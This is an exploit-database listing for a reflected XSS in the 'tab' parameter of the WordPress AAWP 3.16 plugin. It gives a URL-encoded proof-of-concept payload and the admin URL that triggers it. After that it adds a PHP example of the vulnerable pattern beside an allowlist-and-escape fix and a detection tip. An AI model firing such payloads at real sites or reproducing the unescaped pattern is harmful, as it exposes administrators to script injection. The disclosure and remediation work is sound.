0day Today Exploits Market and 0day Exploits Database

WordPress AAWP 3.16 Plugin - (tab) Reflected Cross Site Scripting Vulnerability

Author
Andrea Bocchetti
Risk
Security Risk Medium
0day-ID
0day-ID-37202
Category
web applications
Date added
07-01-2022
Platform
php
# Exploit Title: WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)
# Exploit Author: Andrea Bocchetti
# Vendor Homepage: https://getaawp.com/
# Software Link: https://getaawp.com/
# Version: 3.16
# Tested on: Windows 10 - Chrome, WordPress 5.8.2

# Proof of Concept:
# 1- Install and activate AAWP 3.16 plugin.
# 2- Go to https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX
# 3- Put the payload in the `tab` parameter. XSS payload: %22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y
# 4- The XSS is triggered.

# Go to this URL: "http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y"
# The XSS will trigger.
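The advisory shows the symptom (a `tab` query value reflected into the settings page unencoded) but not the plugin's source. The following is an added example, not code from AAWP or from the advisory author: it models the generic pattern behind this class of bug and places the hardened form next to it. The tab names in the allowlist are assumed for illustration, and `htmlspecialchars()` stands in for WordPress's `esc_attr()`/`esc_html()` so the file runs without WordPress loaded.

```php
<?php
// Added example, not the AAWP plugin's code. The tab names below are assumed.

// Vulnerable pattern: the raw query value is concatenated into an attribute
// and into element text. A value containing '"' or '<' breaks out of both
// contexts, which is exactly what the advisory's payload relies on.
function render_tab_nav_vulnerable(string $tab): string {
    return '<a href="admin.php?page=aawp-settings&tab=' . $tab
         . '" class="nav-tab nav-tab-active">' . $tab . '</a>';
}

// Hardened pattern, two independent layers:
//  1. Restrict `tab` to a fixed set of identifiers (WordPress: sanitize_key()
//     plus an in_array() check), falling back to the default tab.
//  2. Encode on output regardless (WordPress: esc_attr()/esc_html()), so a
//     future allowlist mistake cannot reintroduce the injection.
const ALLOWED_TABS = ['general', 'output', 'api', 'support']; // assumed names

function normalize_tab(?string $tab): string {
    $tab = strtolower((string) $tab);
    // Same character set sanitize_key() permits: a-z, 0-9, '_' and '-'.
    $tab = preg_replace('/[^a-z0-9_\-]/', '', $tab);
    return in_array($tab, ALLOWED_TABS, true) ? $tab : ALLOWED_TABS[0];
}

function esc(string $s): string {
    // ENT_QUOTES encodes both quote styles; without it a value like
    // "onclick=... would still escape a double-quoted attribute.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_tab_nav_hardened(?string $requested): string {
    $tab = normalize_tab($requested);
    // '&' is written as '&amp;' because the href is an HTML attribute value.
    return '<a href="admin.php?page=aawp-settings&amp;tab=' . esc($tab)
         . '" class="nav-tab nav-tab-active">' . esc(ucfirst($tab)) . '</a>';
}

// Constructed input: the decoded form of the payload quoted in the advisory.
$payload = urldecode('%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y');

echo "Vulnerable output (markup structure is broken by the input):\n";
echo render_tab_nav_vulnerable($payload), "\n\n";

echo "Hardened output for the same input (falls back to the default tab):\n";
echo render_tab_nav_hardened($payload), "\n\n";

echo "Hardened output for a valid tab:\n";
echo render_tab_nav_hardened('api'), "\n";
```

The allowlist is the fix that actually removes the bug: a navigation tab is an identifier chosen by the developer, not free text, so nothing from the request needs to reach the page. The output encoding is kept as a second layer, and on the detection side, requests to `admin.php?page=aawp-settings` whose `tab` value is not one of the known identifiers are a simple, low-noise thing to alert on in web server logs.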

#  0day.today [2024-11-15]  #